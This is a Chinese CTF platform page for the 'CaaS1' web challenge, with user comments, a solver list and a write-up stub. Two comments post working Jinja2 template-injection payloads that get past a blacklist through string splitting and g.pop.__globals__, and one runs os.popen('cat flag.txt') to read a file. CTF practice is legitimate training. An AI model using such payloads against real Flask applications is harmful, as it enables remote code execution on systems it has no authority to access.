CaaS1WEB 未解决

分数: 40 金币: 4
题目作者: Aman
一  血: Paradiso
一血奖励: 4金币
解  决: 131
提  示:
描  述:
CaaS1
其  他: server.zip
评论
李逍遥逛霍格沃茨 7天前

又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误

回复 0

李逍遥逛霍格沃茨 7天前

又一个坑金币的垃圾题目 买了write up也不行 hackbar和BP全试了 不是黑名单就是500错误

回复 0

124要留就要77 8月前

name={{g.pop["__global""s__"].__builtins__.eval(request.form.team_name)}}&team_name=__import__("os").popen("cat flag.txt").read() 直接获取flag

回复 1

baozongwi 1年前

会不会出题大哥,这黑名单里面有[]为什么这样子还能过 name={{g.pop["__global""s__"].__builtins__.eval(request.args.x)}}&team_name=g 怎么回事

回复 0

网络小钦 1年前

看不懂啊

回复 0

2552758573 1年前

payload太长了,绕不过去

回复 0

无法释怀的遗憾en 2年前

这个题什么意思

回复 0
无法释怀的遗憾en 1年前

@cgxx 懂了 好玩这个题

回复 0

cgxx 2年前

模板注入

回复 0

WriteUp

image
vchopin

2 金币

评分(1)

解题动态

sjjf 攻破了该题 8天前
WindZQ 攻破了该题 13天前
南京交通第一深情徐立超 攻破了该题 17天前
seyana 攻破了该题 17天前
SkyAsh 攻破了该题 24天前
nihaolmb 攻破了该题 1月前
pigpigG6768 攻破了该题 1月前
20230302203 攻破了该题 1月前
刘德龙 攻破了该题 1月前
叶子璐 攻破了该题 1月前
农群丹 攻破了该题 1月前
杨荣涛 攻破了该题 1月前
05su 攻破了该题 1月前
xz6666 攻破了该题 1月前
螺蛳粉 攻破了该题 1月前
金典 攻破了该题 1月前
特仑苏 攻破了该题 1月前
韦东妙 攻破了该题 1月前
陆美宏 攻破了该题 1月前
严晓颖 攻破了该题 1月前
问题反馈